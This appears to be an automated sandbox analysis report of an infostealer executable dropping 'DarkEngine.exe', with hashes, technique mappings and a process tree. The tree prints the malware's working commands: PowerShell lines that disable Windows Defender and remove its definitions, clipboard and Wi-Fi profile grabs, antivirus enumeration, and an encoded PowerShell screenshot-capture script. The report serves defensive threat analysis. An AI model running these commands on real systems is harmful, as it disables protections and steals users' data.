Analysis
-
max time kernel
139s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04/11/2024, 21:29
Static task
static1
Behavioral task
behavioral1
Sample
39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
Resource
win10v2004-20241007-en
General
-
Target
39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe
-
Size
8.5MB
-
MD5
d951faa8661e5491de72c8d067916c4d
-
SHA1
438f90f3579cbc5a0e9ad852dcdb831ffe9545fa
-
SHA256
39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00
-
SHA512
c0675e116b2fe997f060a044c658536668150bf0cb72d40979e162e6a03f63a59a348f0a4a2364d4a237f0888db84ca637213eff2843ffca0026024adc3b1b2a
-
SSDEEP
196608:ETcUUuvyn6cmN2cuBAgcSd3cWES7EY3uKgzk+3QQSedWJwagKQqxkYLfy:EwhuYR9zcGL3EYeKsk+3QmdWJwQLfy
Malware Config
Signatures
-
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 316 powershell.exe 4148 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 392 DarkEngine.exe -
Loads dropped DLL 18 IoCs
pid Process 392 DarkEngine.exe 392 DarkEngine.exe 392 DarkEngine.exe 392 DarkEngine.exe 392 DarkEngine.exe 392 DarkEngine.exe 392 DarkEngine.exe 392 DarkEngine.exe 392 DarkEngine.exe 392 DarkEngine.exe 392 DarkEngine.exe 392 DarkEngine.exe 392 DarkEngine.exe 392 DarkEngine.exe 392 DarkEngine.exe 392 DarkEngine.exe 392 DarkEngine.exe 392 DarkEngine.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
pid Process 3556 powershell.exe 4532 powershell.exe 3728 powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 3736 tasklist.exe 1944 tasklist.exe 3196 tasklist.exe 1192 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 540 netsh.exe 3588 cmd.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 5100 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4800 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 3556 powershell.exe 3556 powershell.exe 316 powershell.exe 316 powershell.exe 3784 powershell.exe 3784 powershell.exe 316 powershell.exe 3784 powershell.exe 4532 powershell.exe 4532 powershell.exe 3864 powershell.exe 3864 powershell.exe 3864 powershell.exe 3728 powershell.exe 3728 powershell.exe 3728 powershell.exe 5092 powershell.exe 5092 powershell.exe 5092 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3736 tasklist.exe Token: SeDebugPrivilege 3556 powershell.exe Token: SeIncreaseQuotaPrivilege 2628 WMIC.exe Token: SeSecurityPrivilege 2628 WMIC.exe Token: SeTakeOwnershipPrivilege 2628 WMIC.exe Token: SeLoadDriverPrivilege 2628 WMIC.exe Token: SeSystemProfilePrivilege 2628 WMIC.exe Token: SeSystemtimePrivilege 2628 WMIC.exe Token: SeProfSingleProcessPrivilege 2628 WMIC.exe Token: SeIncBasePriorityPrivilege 2628 WMIC.exe Token: SeCreatePagefilePrivilege 2628 WMIC.exe Token: SeBackupPrivilege 2628 WMIC.exe Token: SeRestorePrivilege 2628 WMIC.exe Token: SeShutdownPrivilege 2628 WMIC.exe Token: SeDebugPrivilege 2628 WMIC.exe Token: SeSystemEnvironmentPrivilege 2628 WMIC.exe Token: SeRemoteShutdownPrivilege 2628 WMIC.exe Token: SeUndockPrivilege 2628 WMIC.exe Token: SeManageVolumePrivilege 2628 WMIC.exe Token: 33 2628 WMIC.exe Token: 34 2628 WMIC.exe Token: 35 2628 WMIC.exe Token: 36 2628 WMIC.exe Token: SeIncreaseQuotaPrivilege 2628 WMIC.exe Token: SeSecurityPrivilege 2628 WMIC.exe Token: SeTakeOwnershipPrivilege 2628 WMIC.exe Token: SeLoadDriverPrivilege 2628 WMIC.exe Token: SeSystemProfilePrivilege 2628 WMIC.exe Token: SeSystemtimePrivilege 2628 WMIC.exe Token: SeProfSingleProcessPrivilege 2628 WMIC.exe Token: SeIncBasePriorityPrivilege 2628 WMIC.exe Token: SeCreatePagefilePrivilege 2628 WMIC.exe Token: SeBackupPrivilege 2628 WMIC.exe Token: SeRestorePrivilege 2628 WMIC.exe Token: SeShutdownPrivilege 2628 WMIC.exe Token: SeDebugPrivilege 2628 WMIC.exe Token: SeSystemEnvironmentPrivilege 2628 WMIC.exe Token: SeRemoteShutdownPrivilege 2628 WMIC.exe Token: SeUndockPrivilege 2628 WMIC.exe Token: SeManageVolumePrivilege 2628 WMIC.exe Token: 33 2628 WMIC.exe Token: 34 2628 WMIC.exe Token: 35 2628 WMIC.exe Token: 36 2628 WMIC.exe Token: SeDebugPrivilege 3196 tasklist.exe Token: SeDebugPrivilege 1944 tasklist.exe Token: SeIncreaseQuotaPrivilege 5112 WMIC.exe Token: SeSecurityPrivilege 5112 WMIC.exe Token: SeTakeOwnershipPrivilege 5112 WMIC.exe Token: SeLoadDriverPrivilege 5112 WMIC.exe Token: SeSystemProfilePrivilege 5112 WMIC.exe Token: SeSystemtimePrivilege 5112 WMIC.exe Token: SeProfSingleProcessPrivilege 5112 WMIC.exe Token: SeIncBasePriorityPrivilege 5112 WMIC.exe Token: SeCreatePagefilePrivilege 5112 WMIC.exe Token: SeBackupPrivilege 5112 WMIC.exe Token: SeRestorePrivilege 5112 WMIC.exe Token: SeShutdownPrivilege 5112 WMIC.exe Token: SeDebugPrivilege 5112 WMIC.exe Token: SeSystemEnvironmentPrivilege 5112 WMIC.exe Token: SeRemoteShutdownPrivilege 5112 WMIC.exe Token: SeUndockPrivilege 5112 WMIC.exe Token: SeManageVolumePrivilege 5112 WMIC.exe Token: 33 5112 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3596 wrote to memory of 392 3596 39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe 84 PID 3596 wrote to memory of 392 3596 39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe 84 PID 392 wrote to memory of 3644 392 DarkEngine.exe 88 PID 392 wrote to memory of 3644 392 DarkEngine.exe 88 PID 392 wrote to memory of 3636 392 DarkEngine.exe 90 PID 392 wrote to memory of 3636 392 DarkEngine.exe 90 PID 3636 wrote to memory of 3736 3636 cmd.exe 92 PID 3636 wrote to memory of 3736 3636 cmd.exe 92 PID 3644 wrote to memory of 3556 3644 cmd.exe 93 PID 3644 wrote to memory of 3556 3644 cmd.exe 93 PID 392 wrote to memory of 1464 392 DarkEngine.exe 95 PID 392 wrote to memory of 1464 392 DarkEngine.exe 95 PID 1464 wrote to memory of 2628 1464 cmd.exe 127 PID 1464 wrote to memory of 2628 1464 cmd.exe 127 PID 392 wrote to memory of 4632 392 DarkEngine.exe 98 PID 392 wrote to memory of 4632 392 DarkEngine.exe 98 PID 392 wrote to memory of 720 392 DarkEngine.exe 99 PID 392 wrote to memory of 720 392 DarkEngine.exe 99 PID 392 wrote to memory of 2820 392 DarkEngine.exe 102 PID 392 wrote to memory of 2820 392 DarkEngine.exe 102 PID 720 wrote to memory of 3196 720 cmd.exe 104 PID 720 wrote to memory of 3196 720 cmd.exe 104 PID 4632 wrote to memory of 1944 4632 cmd.exe 105 PID 4632 wrote to memory of 1944 4632 cmd.exe 105 PID 392 wrote to memory of 4148 392 DarkEngine.exe 106 PID 392 wrote to memory of 4148 392 DarkEngine.exe 106 PID 2820 wrote to memory of 5112 2820 cmd.exe 107 PID 2820 wrote to memory of 5112 2820 cmd.exe 107 PID 392 wrote to memory of 2696 392 DarkEngine.exe 108 PID 392 wrote to memory of 2696 392 DarkEngine.exe 108 PID 392 wrote to memory of 2816 392 DarkEngine.exe 110 PID 392 wrote to memory of 2816 392 DarkEngine.exe 110 PID 392 wrote to memory of 3588 392 DarkEngine.exe 113 PID 392 wrote to memory of 3588 392 DarkEngine.exe 113 PID 392 wrote to memory of 1164 392 DarkEngine.exe 115 PID 392 wrote to memory of 1164 392 DarkEngine.exe 115 PID 392 wrote to memory of 4320 392 DarkEngine.exe 117 PID 392 wrote to memory of 4320 392 DarkEngine.exe 117 PID 2816 wrote to memory of 4864 2816 cmd.exe 118 PID 2816 wrote to memory of 4864 2816 cmd.exe 118 PID 4148 wrote to memory of 316 4148 cmd.exe 119 PID 4148 wrote to memory of 316 4148 cmd.exe 119 PID 2696 wrote to memory of 1192 2696 cmd.exe 120 PID 2696 wrote to memory of 1192 2696 cmd.exe 120 PID 3588 wrote to memory of 540 3588 cmd.exe 122 PID 3588 wrote to memory of 540 3588 cmd.exe 122 PID 4320 wrote to memory of 3784 4320 cmd.exe 123 PID 4320 wrote to memory of 3784 4320 cmd.exe 123 PID 392 wrote to memory of 4308 392 DarkEngine.exe 124 PID 392 wrote to memory of 4308 392 DarkEngine.exe 124 PID 1164 wrote to memory of 4800 1164 cmd.exe 126 PID 1164 wrote to memory of 4800 1164 cmd.exe 126 PID 4308 wrote to memory of 2628 4308 cmd.exe 127 PID 4308 wrote to memory of 2628 4308 cmd.exe 127 PID 392 wrote to memory of 4356 392 DarkEngine.exe 128 PID 392 wrote to memory of 4356 392 DarkEngine.exe 128 PID 4356 wrote to memory of 1864 4356 cmd.exe 130 PID 4356 wrote to memory of 1864 4356 cmd.exe 130 PID 392 wrote to memory of 4424 392 DarkEngine.exe 131 PID 392 wrote to memory of 4424 392 DarkEngine.exe 131 PID 3784 wrote to memory of 4120 3784 powershell.exe 133 PID 3784 wrote to memory of 4120 3784 powershell.exe 133 PID 4424 wrote to memory of 544 4424 cmd.exe 134 PID 4424 wrote to memory of 544 4424 cmd.exe 134
Processes
-
C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe"C:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Users\Admin\AppData\Local\Temp\onefile_3596_133752293634062678\DarkEngine.exeC:\Users\Admin\AppData\Local\Temp\39525e447800ddb94d0afdfc345884a9f3ee654fdc254d745d99645fcc21bf00.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5112
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:4148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1192
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:4864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lb5mhvf0\lb5mhvf0.cmdline"5⤵PID:4120
-
